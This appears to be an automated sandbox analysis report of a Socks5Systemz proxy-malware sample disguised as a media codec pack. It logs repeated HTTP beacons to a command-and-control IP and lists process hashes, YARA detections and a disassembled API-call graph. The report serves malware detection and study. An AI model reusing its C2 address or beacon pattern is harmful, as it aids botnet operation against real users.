                                                                                          24192.168.2.449900188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:59 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:59 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:59 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:59 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          25192.168.2.449905188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:46:01 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:46:02 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:46:02 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:46:02 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          26192.168.2.449911188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:46:04 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:46:04 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:46:04 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:46:04 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          27192.168.2.449918188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:46:06 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:46:07 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:46:06 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:46:07 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Click to jump to process

                                                                                          Click to jump to process

                                                                                          Click to dive into process behavior distribution

                                                                                          Click to jump to process

                                                                                          Target ID:0
                                                                                          Start time:07:44:01
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Users\user\Desktop\steel.exe.3.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\steel.exe.3.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:3'295'664 bytes
                                                                                          MD5 hash:DB153670ED84A7E848FA356E7AECC80D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          Target ID:1
                                                                                          Start time:07:44:01
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp" /SL5="$2043C,3046688,56832,C:\Users\user\Desktop\steel.exe.3.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:706'560 bytes
                                                                                          MD5 hash:192CB1EFDC38E560F417C173410B8749
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.2981700405.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          Target ID:2
                                                                                          Start time:07:44:02
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe" -i
                                                                                          Imagebase:0x400000
                                                                                          File size:3'186'888 bytes
                                                                                          MD5 hash:1BADA3AB49364C26DA68D41031611AC7
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000002.00000002.2981856828.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000002.00000000.1743204779.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:21.5%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:2.4%
                                                                                            Total number of Nodes:1520
                                                                                            Total number of Limit Nodes:22
                                                                                            execution_graph 5446 407548 5447 407554 CloseHandle 5446->5447 5448 40755d 5446->5448 5447->5448 6683 402b48 RaiseException 5888 407749 5889 4076dc WriteFile 5888->5889 5894 407724 5888->5894 5890 4076e8 5889->5890 5891 4076ef 5889->5891 5892 40748c 35 API calls 5890->5892 5893 407700 5891->5893 5895 4073ec 34 API calls 5891->5895 5892->5891 5894->5888 5896 4077e0 5894->5896 5895->5893 5897 4078db InterlockedExchange 5896->5897 5899 407890 5896->5899 5898 4078e7 5897->5898 6684 40294a 6685 402952 6684->6685 6686 402967 6685->6686 6687 403554 4 API calls 6685->6687 6687->6685 6688 403f4a 6689 403f53 6688->6689 6690 403f5c 6688->6690 6692 403f07 6689->6692 6695 403f09 6692->6695 6694 403f3c 6694->6690 6697 403154 4 API calls 6695->6697 6699 403e9c 6695->6699 6702 403f3d 6695->6702 6715 403e9c 6695->6715 6696 403ea9 6704 402674 4 API calls 6696->6704 6705 403ecf 6696->6705 6697->6695 6698 403ef2 6701 402674 4 API calls 6698->6701 6699->6694 6699->6696 6699->6698 6706 403e8e 6699->6706 6701->6705 6702->6690 6704->6705 6705->6690 6707 403e4c 6706->6707 6708 403e62 6707->6708 6709 403e7b 6707->6709 6711 403e67 6707->6711 6710 403cc8 4 API calls 6708->6710 6712 402674 4 API calls 6709->6712 6710->6711 6713 403e78 6711->6713 6714 402674 4 API calls 6711->6714 6712->6713 6713->6696 6713->6698 6714->6713 6716 403ed7 6715->6716 6722 403ea9 6715->6722 6717 403ef2 6716->6717 6719 403e8e 4 API calls 6716->6719 6720 402674 4 API calls 6717->6720 6718 403ecf 6718->6695 6721 403ee6 6719->6721 6720->6718 6721->6717 6721->6722 6722->6718 6723 402674 4 API calls 6722->6723 6723->6718 6242 40ac4f 6243 40abc1 6242->6243 6244 4094d8 9 API calls 6243->6244 6246 40abed 6243->6246 6244->6246 6245 40ac06 6247 40ac1a 6245->6247 6248 40ac0f DestroyWindow 6245->6248 6246->6245 6249 40ac00 RemoveDirectoryA 6246->6249 6250 40ac42 6247->6250 6251 40357c 4 API calls 6247->6251 6248->6247 6249->6245 6252 40ac38 6251->6252 6253 4025ac 4 API calls 6252->6253 6253->6250 6254 403a52 6255 403a74 6254->6255 6256 403a5a WriteFile 6254->6256 6256->6255 6257 403a78 GetLastError 6256->6257 6257->6255 6258 402654 6259 403154 4 API calls 6258->6259 6260 402614 6259->6260 6261 402632 6260->6261 6262 403154 4 API calls 6260->6262 6261->6261 6262->6261 6263 40ac56 6264 40ac5d 6263->6264 6266 40ac88 6263->6266 6273 409448 6264->6273 6268 403198 4 API calls 6266->6268 6267 40ac62 6267->6266 6270 40ac80 MessageBoxA 6267->6270 6269 40acc0 6268->6269 6271 403198 4 API calls 6269->6271 6270->6266 6272 40acc8 6271->6272 6274 409454 GetCurrentProcess OpenProcessToken 6273->6274 6275 4094af ExitWindowsEx 6273->6275 6276 409466 6274->6276 6277 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6274->6277 6275->6276 6276->6267 6277->6275 6277->6276 6732 40995e 6734 409960 6732->6734 6733 409982 6734->6733 6735 40999e CallWindowProcA 6734->6735 6735->6733 6736 409960 6737 409982 6736->6737 6739 40996f 6736->6739 6738 40999e CallWindowProcA 6738->6737 6739->6737 6739->6738 6740 405160 6741 405173 6740->6741 6742 404e58 33 API calls 6741->6742 6743 405187 6742->6743 6278 402e64 6279 402e69 6278->6279 6280 402e7a RtlUnwind 6279->6280 6281 402e5e 6279->6281 6282 402e9d 6280->6282 5900 40766c SetFilePointer 5901 4076a3 5900->5901 5902 407693 GetLastError 5900->5902 5902->5901 5903 40769c 5902->5903 5904 40748c 35 API calls 5903->5904 5904->5901 6295 40667c IsDBCSLeadByte 6296 406694 6295->6296 6756 403f7d 6757 403fa2 6756->6757 6760 403f84 6756->6760 6759 403e8e 4 API calls 6757->6759 6757->6760 6758 403f8c 6759->6760 6760->6758 6761 402674 4 API calls 6760->6761 6762 403fca 6761->6762 6763 403d02 6769 403d12 6763->6769 6764 403ddf ExitProcess 6765 403db8 6766 403cc8 4 API calls 6765->6766 6768 403dc2 6766->6768 6767 403dea 6770 403cc8 4 API calls 6768->6770 6769->6764 6769->6765 6769->6767 6769->6769 6773 403da4 6769->6773 6774 403d8f MessageBoxA 6769->6774 6771 403dcc 6770->6771 6783 4019dc 6771->6783 6779 403fe4 6773->6779 6774->6765 6775 403dd1 6775->6764 6775->6767 6780 403fe8 6779->6780 6781 403f07 4 API calls 6780->6781 6782 404006 6781->6782 6784 401abb 6783->6784 6785 4019ed 6783->6785 6784->6775 6786 401a04 RtlEnterCriticalSection 6785->6786 6787 401a0e LocalFree 6785->6787 6786->6787 6788 401a41 6787->6788 6789 401a2f VirtualFree 6788->6789 6790 401a49 6788->6790 6789->6788 6791 401a70 LocalFree 6790->6791 6792 401a87 6790->6792 6791->6791 6791->6792 6793 401aa9 RtlDeleteCriticalSection 6792->6793 6794 401a9f RtlLeaveCriticalSection 6792->6794 6793->6775 6794->6793 6301 404206 6302 4041cc 6301->6302 6305 40420a 6301->6305 6303 404282 6304 403154 4 API calls 6306 404323 6304->6306 6305->6303 6305->6304 6307 402c08 6308 402c82 6307->6308 6311 402c19 6307->6311 6309 402c56 RtlUnwind 6310 403154 4 API calls 6309->6310 6310->6308 6311->6308 6311->6309 6314 402b28 6311->6314 6315 402b31 RaiseException 6314->6315 6316 402b47 6314->6316 6315->6316 6316->6309 6317 408c10 6318 408c17 6317->6318 6319 403198 4 API calls 6318->6319 6327 408cb1 6319->6327 6320 408cdc 6321 4031b8 4 API calls 6320->6321 6322 408d69 6321->6322 6323 408cc8 6325 4032fc 18 API calls 6323->6325 6324 403278 18 API calls 6324->6327 6325->6320 6326 4032fc 18 API calls 6326->6327 6327->6320 6327->6323 6327->6324 6327->6326 6332 40a814 6333 40a839 6332->6333 6334 40993c 29 API calls 6333->6334 6337 40a83e 6334->6337 6335 40a891 6366 4026c4 GetSystemTime 6335->6366 6337->6335 6340 408dd8 18 API calls 6337->6340 6338 40a896 6339 409330 46 API calls 6338->6339 6341 40a89e 6339->6341 6342 40a86d 6340->6342 6343 4031e8 18 API calls 6341->6343 6346 40a875 MessageBoxA 6342->6346 6344 40a8ab 6343->6344 6345 406928 19 API calls 6344->6345 6347 40a8b8 6345->6347 6346->6335 6348 40a882 6346->6348 6349 4066c0 19 API calls 6347->6349 6350 405864 19 API calls 6348->6350 6351 40a8c8 6349->6351 6350->6335 6352 406638 19 API calls 6351->6352 6353 40a8d9 6352->6353 6354 403340 18 API calls 6353->6354 6355 40a8e7 6354->6355 6356 4031e8 18 API calls 6355->6356 6357 40a8f7 6356->6357 6358 4074e0 37 API calls 6357->6358 6359 40a936 6358->6359 6360 402594 18 API calls 6359->6360 6361 40a956 6360->6361 6362 407a28 19 API calls 6361->6362 6363 40a998 6362->6363 6364 407cb8 35 API calls 6363->6364 6365 40a9bf 6364->6365 6366->6338 5444 407017 5445 407008 SetErrorMode 5444->5445 6367 403018 6368 403070 6367->6368 6369 403025 6367->6369 6370 40302a RtlUnwind 6369->6370 6371 40304e 6370->6371 6373 402f78 6371->6373 6374 402be8 6371->6374 6375 402bf1 RaiseException 6374->6375 6376 402c04 6374->6376 6375->6376 6376->6368 6381 40901e 6382 409010 6381->6382 6383 408fac Wow64RevertWow64FsRedirection 6382->6383 6384 409018 6383->6384 6385 409020 SetLastError 6386 409029 6385->6386 6401 403a28 ReadFile 6402 403a46 6401->6402 6403 403a49 GetLastError 6401->6403 5905 40762c ReadFile 5906 407663 5905->5906 5907 40764c 5905->5907 5908 407652 GetLastError 5907->5908 5909 40765c 5907->5909 5908->5906 5908->5909 5910 40748c 35 API calls 5909->5910 5910->5906 6805 40712e 6806 407118 6805->6806 6807 403198 4 API calls 6806->6807 6808 407120 6807->6808 6809 403198 4 API calls 6808->6809 6810 407128 6809->6810 5925 40a82f 5926 409ae8 18 API calls 5925->5926 5927 40a834 5926->5927 5928 40a839 5927->5928 5929 402f24 5 API calls 5927->5929 5962 40993c 5928->5962 5929->5928 5931 40a891 5967 4026c4 GetSystemTime 5931->5967 5933 40a83e 5933->5931 6028 408dd8 5933->6028 5934 40a896 5968 409330 5934->5968 5938 40a86d 5942 40a875 MessageBoxA 5938->5942 5939 4031e8 18 API calls 5940 40a8ab 5939->5940 5986 406928 5940->5986 5942->5931 5944 40a882 5942->5944 6031 405864 5944->6031 5949 40a8d9 6013 403340 5949->6013 5951 40a8e7 5952 4031e8 18 API calls 5951->5952 5953 40a8f7 5952->5953 5954 4074e0 37 API calls 5953->5954 5955 40a936 5954->5955 5956 402594 18 API calls 5955->5956 5957 40a956 5956->5957 5958 407a28 19 API calls 5957->5958 5959 40a998 5958->5959 5960 407cb8 35 API calls 5959->5960 5961 40a9bf 5960->5961 6035 40953c 5962->6035 5965 4098cc 19 API calls 5966 40995c 5965->5966 5966->5933 5967->5934 5977 409350 5968->5977 5971 409375 CreateDirectoryA 5972 4093ed 5971->5972 5973 40937f GetLastError 5971->5973 5974 40322c 4 API calls 5972->5974 5973->5977 5975 4093f7 5974->5975 5978 4031b8 4 API calls 5975->5978 5976 408dd8 18 API calls 5976->5977 5977->5971 5977->5976 5979 404c94 33 API calls 5977->5979 5981 407284 19 API calls 5977->5981 5984 408da8 18 API calls 5977->5984 5985 405890 18 API calls 5977->5985 6091 406cf4 5977->6091 6114 409224 5977->6114 5980 409411 5978->5980 5979->5977 5982 4031b8 4 API calls 5980->5982 5981->5977 5983 40941e 5982->5983 5983->5939 5984->5977 5985->5977 6220 406820 5986->6220 5989 403454 18 API calls 5990 40694a 5989->5990 5991 4066c0 5990->5991 6225 4068e4 5991->6225 5994 4066f0 5996 403340 18 API calls 5994->5996 5995 4066fe 5997 403454 18 API calls 5995->5997 5999 4066fc 5996->5999 5998 406711 5997->5998 6000 403340 18 API calls 5998->6000 6001 403198 4 API calls 5999->6001 6000->5999 6002 406733 6001->6002 6003 406638 6002->6003 6004 406642 6003->6004 6005 406665 6003->6005 6231 406950 6004->6231 6007 40322c 4 API calls 6005->6007 6009 40666e 6007->6009 6008 406649 6008->6005 6010 406654 6008->6010 6009->5949 6011 403340 18 API calls 6010->6011 6012 406662 6011->6012 6012->5949 6014 403344 6013->6014 6015 4033a5 6013->6015 6016 4031e8 6014->6016 6017 40334c 6014->6017 6020 403254 18 API calls 6016->6020 6023 4031fc 6016->6023 6017->6015 6019 40335b 6017->6019 6021 4031e8 18 API calls 6017->6021 6018 403228 6018->5951 6022 403254 18 API calls 6019->6022 6020->6023 6021->6019 6025 403375 6022->6025 6023->6018 6024 4025ac 4 API calls 6023->6024 6024->6018 6026 4031e8 18 API calls 6025->6026 6027 4033a1 6026->6027 6027->5951 6029 408da8 18 API calls 6028->6029 6030 408df4 6029->6030 6030->5938 6032 405869 6031->6032 6033 405940 19 API calls 6032->6033 6034 40587b 6033->6034 6034->6034 6042 40955b 6035->6042 6036 409590 6038 40959d GetUserDefaultLangID 6036->6038 6043 409592 6036->6043 6037 409594 6047 407024 GetModuleHandleA GetProcAddress 6037->6047 6038->6043 6041 40956f 6041->5965 6042->6036 6042->6037 6042->6041 6043->6041 6044 4095cb GetACP 6043->6044 6045 4095ef 6043->6045 6044->6041 6044->6043 6045->6041 6046 409615 GetACP 6045->6046 6046->6041 6046->6045 6048 407067 6047->6048 6049 40705e 6047->6049 6050 407070 6048->6050 6051 4070a8 6048->6051 6058 403198 4 API calls 6049->6058 6068 406f68 6050->6068 6052 406f68 RegOpenKeyExA 6051->6052 6056 4070c1 6052->6056 6054 407089 6055 4070de 6054->6055 6071 406f5c 6054->6071 6060 40322c 4 API calls 6055->6060 6056->6055 6059 406f5c 20 API calls 6056->6059 6062 407120 6058->6062 6063 4070d5 RegCloseKey 6059->6063 6064 4070eb 6060->6064 6065 403198 4 API calls 6062->6065 6063->6055 6066 4032fc 18 API calls 6064->6066 6067 407128 6065->6067 6066->6049 6067->6043 6069 406f73 6068->6069 6070 406f79 RegOpenKeyExA 6068->6070 6069->6070 6070->6054 6074 406e10 6071->6074 6075 406e36 RegQueryValueExA 6074->6075 6076 406e59 6075->6076 6081 406e7b 6075->6081 6077 406e73 6076->6077 6076->6081 6082 403278 18 API calls 6076->6082 6083 403420 18 API calls 6076->6083 6079 403198 4 API calls 6077->6079 6078 403198 4 API calls 6080 406f47 RegCloseKey 6078->6080 6079->6081 6080->6055 6081->6078 6082->6076 6084 406eb0 RegQueryValueExA 6083->6084 6084->6075 6085 406ecc 6084->6085 6085->6081 6086 4034f0 18 API calls 6085->6086 6087 406f0e 6086->6087 6088 406f20 6087->6088 6090 403420 18 API calls 6087->6090 6089 4031e8 18 API calls 6088->6089 6089->6081 6090->6088 6133 406a58 6091->6133 6095 406a58 19 API calls 6097 406d36 6095->6097 6096 406d26 6096->6095 6098 406d72 6096->6098 6099 406d42 6097->6099 6101 406a34 21 API calls 6097->6101 6141 406888 6098->6141 6099->6098 6102 406d67 6099->6102 6105 406a58 19 API calls 6099->6105 6101->6099 6102->6098 6153 406cc8 GetWindowsDirectoryA 6102->6153 6107 406d5b 6105->6107 6106 406638 19 API calls 6108 406d87 6106->6108 6107->6102 6109 406a34 21 API calls 6107->6109 6110 40322c 4 API calls 6108->6110 6109->6102 6111 406d91 6110->6111 6112 4031b8 4 API calls 6111->6112 6113 406dab 6112->6113 6113->5977 6115 409244 6114->6115 6116 406638 19 API calls 6115->6116 6117 40925d 6116->6117 6118 40322c 4 API calls 6117->6118 6125 409268 6118->6125 6120 406978 20 API calls 6120->6125 6121 4033b4 18 API calls 6121->6125 6122 408dd8 18 API calls 6122->6125 6123 405890 18 API calls 6123->6125 6125->6120 6125->6121 6125->6122 6125->6123 6126 4092e4 6125->6126 6193 4091b0 6125->6193 6201 409034 6125->6201 6127 40322c 4 API calls 6126->6127 6128 4092ef 6127->6128 6129 4031b8 4 API calls 6128->6129 6130 409309 6129->6130 6131 403198 4 API calls 6130->6131 6132 409311 6131->6132 6132->5977 6134 4034f0 18 API calls 6133->6134 6136 406a6b 6134->6136 6135 406a82 GetEnvironmentVariableA 6135->6136 6137 406a8e 6135->6137 6136->6135 6140 406a95 6136->6140 6155 406dec 6136->6155 6138 403198 4 API calls 6137->6138 6138->6140 6140->6096 6150 406a34 6140->6150 6142 403414 6141->6142 6143 4068ab GetFullPathNameA 6142->6143 6144 4068b7 6143->6144 6145 4068ce 6143->6145 6144->6145 6146 4068bf 6144->6146 6147 40322c 4 API calls 6145->6147 6148 403278 18 API calls 6146->6148 6149 4068cc 6147->6149 6148->6149 6149->6106 6159 4069dc 6150->6159 6154 406ce9 6153->6154 6154->6098 6156 406dfa 6155->6156 6157 4034f0 18 API calls 6156->6157 6158 406e08 6157->6158 6158->6136 6166 406978 6159->6166 6161 4069fe 6162 406a06 GetFileAttributesA 6161->6162 6163 406a1b 6162->6163 6164 403198 4 API calls 6163->6164 6165 406a23 6164->6165 6165->6096 6176 406744 6166->6176 6168 4069b0 6171 4069c6 6168->6171 6172 4069bb 6168->6172 6170 406989 6170->6168 6183 406970 CharPrevA 6170->6183 6184 403454 6171->6184 6173 40322c 4 API calls 6172->6173 6175 4069c4 6173->6175 6175->6161 6180 406755 6176->6180 6177 4067b9 6178 406680 IsDBCSLeadByte 6177->6178 6179 4067b4 6177->6179 6178->6179 6179->6170 6180->6177 6182 406773 6180->6182 6182->6179 6191 406680 IsDBCSLeadByte 6182->6191 6183->6170 6185 403486 6184->6185 6186 403459 6184->6186 6187 403198 4 API calls 6185->6187 6186->6185 6189 40346d 6186->6189 6188 40347c 6187->6188 6188->6175 6190 403278 18 API calls 6189->6190 6190->6188 6192 406694 6191->6192 6192->6182 6194 403198 4 API calls 6193->6194 6196 4091d1 6194->6196 6198 4091fe 6196->6198 6210 4032a8 6196->6210 6213 403494 6196->6213 6199 403198 4 API calls 6198->6199 6200 409213 6199->6200 6200->6125 6202 408f70 2 API calls 6201->6202 6203 40904a 6202->6203 6204 40904e 6203->6204 6217 406a48 6203->6217 6204->6125 6207 409081 6208 408fac Wow64RevertWow64FsRedirection 6207->6208 6209 409089 6208->6209 6209->6125 6211 403278 18 API calls 6210->6211 6212 4032b5 6211->6212 6212->6196 6214 403498 6213->6214 6216 4034c3 6213->6216 6215 4034f0 18 API calls 6214->6215 6215->6216 6216->6196 6218 4069dc 21 API calls 6217->6218 6219 406a52 GetLastError 6218->6219 6219->6207 6221 406744 IsDBCSLeadByte 6220->6221 6223 406835 6221->6223 6222 40687f 6222->5989 6223->6222 6224 406680 IsDBCSLeadByte 6223->6224 6224->6223 6226 4068f3 6225->6226 6227 406820 IsDBCSLeadByte 6226->6227 6229 4068fe 6227->6229 6228 4066ea 6228->5994 6228->5995 6229->6228 6230 406680 IsDBCSLeadByte 6229->6230 6230->6229 6232 406957 6231->6232 6233 40695b 6231->6233 6232->6008 6236 406970 CharPrevA 6233->6236 6235 40696c 6235->6008 6236->6235 6811 408f30 6814 408dfc 6811->6814 6815 408e05 6814->6815 6816 403198 4 API calls 6815->6816 6817 408e13 6815->6817 6816->6815 6818 403932 6819 403924 6818->6819 6820 40374c VariantClear 6819->6820 6821 40392c 6820->6821 5381 4075c4 SetFilePointer 5382 4075f7 5381->5382 5383 4075e7 GetLastError 5381->5383 5383->5382 5384 4075f0 5383->5384 5386 40748c GetLastError 5384->5386 5389 4073ec 5386->5389 5390 407284 19 API calls 5389->5390 5391 407414 5390->5391 5392 407434 5391->5392 5393 405194 33 API calls 5391->5393 5394 405890 18 API calls 5392->5394 5393->5392 5395 407443 5394->5395 5396 403198 4 API calls 5395->5396 5397 407460 5396->5397 5397->5382 6412 4076c8 WriteFile 6413 4076e8 6412->6413 6414 4076ef 6412->6414 6415 40748c 35 API calls 6413->6415 6416 407700 6414->6416 6417 4073ec 34 API calls 6414->6417 6415->6414 6417->6416 6418 402ccc 6421 402cfe 6418->6421 6422 402cdd 6418->6422 6419 402d88 RtlUnwind 6420 403154 4 API calls 6419->6420 6420->6421 6422->6419 6422->6421 6423 402b28 RaiseException 6422->6423 6424 402d7f 6423->6424 6424->6419 6830 403fcd 6831 403f07 4 API calls 6830->6831 6832 403fd6 6831->6832 6833 403e9c 4 API calls 6832->6833 6834 403fe2 6833->6834 6431 4024d0 6432 4024e4 6431->6432 6433 4024e9 6431->6433 6436 401918 4 API calls 6432->6436 6434 402518 6433->6434 6435 40250e RtlEnterCriticalSection 6433->6435 6438 4024ed 6433->6438 6446 402300 6434->6446 6435->6434 6436->6433 6439 402525 6442 402581 6439->6442 6443 402577 RtlLeaveCriticalSection 6439->6443 6441 401fd4 14 API calls 6444 402531 6441->6444 6443->6442 6444->6439 6445 40215c 9 API calls 6444->6445 6445->6439 6447 402314 6446->6447 6449 4023b8 6447->6449 6451 402335 6447->6451 6448 402344 6448->6439 6448->6441 6449->6448 6450 401d80 9 API calls 6449->6450 6454 402455 6449->6454 6456 401e84 6449->6456 6450->6449 6451->6448 6452 401b74 9 API calls 6451->6452 6452->6448 6454->6448 6455 401d00 9 API calls 6454->6455 6455->6448 6461 401768 6456->6461 6458 401e99 6459 401ea6 6458->6459 6460 401dcc 9 API calls 6458->6460 6459->6449 6460->6459 6462 401787 6461->6462 6463 40183b 6462->6463 6464 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6462->6464 6466 40132c LocalAlloc 6462->6466 6467 401821 6462->6467 6469 4017d6 6462->6469 6465 4015c4 VirtualAlloc 6463->6465 6470 4017e7 6463->6470 6464->6462 6465->6470 6466->6462 6468 40150c VirtualFree 6467->6468 6468->6470 6471 40150c VirtualFree 6469->6471 6470->6458 6471->6470 6472 4028d2 6473 4028da 6472->6473 6474 403554 4 API calls 6473->6474 6475 4028ef 6473->6475 6474->6473 6476 4025ac 4 API calls 6475->6476 6477 4028f4 6476->6477 6835 4019d3 6836 4019ba 6835->6836 6837 4019c3 RtlLeaveCriticalSection 6836->6837 6838 4019cd 6836->6838 6837->6838 5398 407fd4 5399 407fe6 5398->5399 5401 407fed 5398->5401 5409 407f10 5399->5409 5403 408017 5401->5403 5405 408015 5401->5405 5408 408021 5401->5408 5402 40804e 5420 407d7c 5403->5420 5404 407d7c 33 API calls 5404->5402 5423 407e2c 5405->5423 5408->5402 5408->5404 5410 407f25 5409->5410 5411 407d7c 33 API calls 5410->5411 5412 407f34 5410->5412 5411->5412 5413 407f6e 5412->5413 5414 407d7c 33 API calls 5412->5414 5415 407f82 5413->5415 5416 407d7c 33 API calls 5413->5416 5414->5413 5419 407fae 5415->5419 5430 407eb8 5415->5430 5416->5415 5419->5401 5433 4058c4 5420->5433 5422 407d9e 5422->5408 5424 405194 33 API calls 5423->5424 5425 407e57 5424->5425 5441 407de4 5425->5441 5427 407e5f 5428 403198 4 API calls 5427->5428 5429 407e74 5428->5429 5429->5408 5431 407ec7 VirtualFree 5430->5431 5432 407ed9 VirtualAlloc 5430->5432 5431->5432 5432->5419 5435 4058d0 5433->5435 5434 405194 33 API calls 5436 4058fd 5434->5436 5435->5434 5437 4031e8 18 API calls 5436->5437 5438 405908 5437->5438 5439 403198 4 API calls 5438->5439 5440 40591d 5439->5440 5440->5422 5442 4058c4 33 API calls 5441->5442 5443 407e06 5442->5443 